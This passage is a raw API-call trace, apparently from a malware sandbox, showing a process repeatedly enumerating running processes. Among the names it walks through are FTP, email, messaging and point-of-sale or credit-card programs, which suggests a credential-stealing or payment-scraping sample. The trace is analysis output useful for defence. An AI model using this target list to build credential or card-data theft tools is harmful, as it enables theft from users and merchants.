lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0217.907] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0217.946] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0217.948] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0217.950] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0217.951] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0217.953] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0217.954] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0217.956] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0217.957] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0217.960] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0217.962] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0217.964] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0217.965] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0217.967] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0217.968] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0217.970] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0217.971] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0217.973] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0217.975] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0217.978] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0217.980] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0218.032] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0218.034] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0218.036] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0218.039] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0218.041] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0218.103] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0218.105] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0218.107] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0218.109] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0218.110] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0218.113] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0218.115] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0218.117] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0218.119] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0218.121] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0218.123] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0218.125] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0218.128] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0218.175] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0218.177] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0218.179] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0218.181] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0218.183] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0218.184] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0218.186] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0218.188] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0218.190] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0218.191] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0218.193] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0218.195] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0218.224] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0218.226] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0218.228] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0218.230] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0218.232] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0218.234] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0218.298] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0218.300] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0218.304] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0218.306] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0218.308] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0218.309] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0218.311] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0218.313] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0218.314] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0218.316] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0218.318] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0218.320] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0218.321] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0218.325] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0218.327] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0218.328] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0218.330] CloseHandle (hObject=0x1eb8) returned 1 [0218.330] Sleep (dwMilliseconds=0x64) [0218.378] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0218.429] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.431] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0218.432] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0218.434] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0218.435] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0218.437] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0218.439] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0218.440] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, 